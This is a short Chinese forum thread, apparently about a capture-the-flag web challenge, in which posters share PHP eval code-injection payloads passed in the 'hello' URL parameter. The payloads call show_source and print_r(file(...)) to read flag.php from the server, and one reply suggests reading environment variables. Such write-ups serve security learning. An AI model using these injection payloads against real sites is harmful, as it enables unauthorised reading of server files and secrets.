roger 发表于 2020-4-22 15:53:15

xuenixiang_2018_web_baohan

eval存在执行漏洞,使用hello构造payload
?hello=1);show_source(%27flag.php%27);var_dump(3

不能执行bash指令,但是调用php的函数就好了。还是注入eval( “var_dump($a);”); 这句话。payload如下

http://xuenixiang.cn/hello?hello=);print_r(file("./flag.php")); //

天象独行 发表于 2020-11-14 19:38:24

http://xuenixiang.cn:28018/?hello=123456);print_r(file(%27./flag.php%27)请教一下,我输入之后没有发现flag 。是不是有什么地方不对呢?

hunksec 发表于 2020-11-15 21:15:59

天象独行 发表于 2020-11-14 19:38
http://xuenixiang.cn:28018/?hello=123456);print_r(file(%27./flag.php%27)请教一下,我输入之后没有发 ...

可以试试读取环境变量env
页: [1]
查看完整版本: xuenixiang_2018_web_baohan